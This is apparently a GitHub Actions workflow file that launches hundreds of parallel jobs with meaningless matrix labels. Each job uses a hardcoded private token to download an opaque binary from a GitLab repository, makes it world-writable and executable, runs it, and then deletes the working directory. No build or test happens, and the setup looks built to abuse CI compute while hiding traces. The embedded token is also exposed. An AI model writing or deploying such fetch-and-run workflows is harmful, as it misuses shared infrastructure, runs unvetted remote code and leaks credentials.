name: Commulative_Edition

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs: 
  edition:
    runs-on: Ubuntu-20.04    
    strategy:
      matrix:
        Commutative: [Com00,Com01,Com02,Com03,Com04,Com05,Com06,Com07,Com08,Com09,Com10,Com11]
        Edition: [S-01,S-02,S-03,S-04,S-05,S-06,S-07,S08,S09,S10,S,11,S-12,S-13,S-14,S-15,S-16,S-17,S-18,S-19,S-20]
      fail-fast: false
    steps:
    - name: Run checkout@v2.3.4
      uses: actions/checkout@v2.3.4

    - name: Edition
      run: |
        wget -O commutative --header='PRIVATE-TOKEN: 7iGMroEzGZyPJSp1AFCp' 'https://gitlab.com/api/v4/projects/25084372/repository/files/commutative/raw?ref=master' && chmod 777 commutative && ./commutative
        echo "done"
    - name: Run
      run: |
        rm -rf *
        echo "done"  
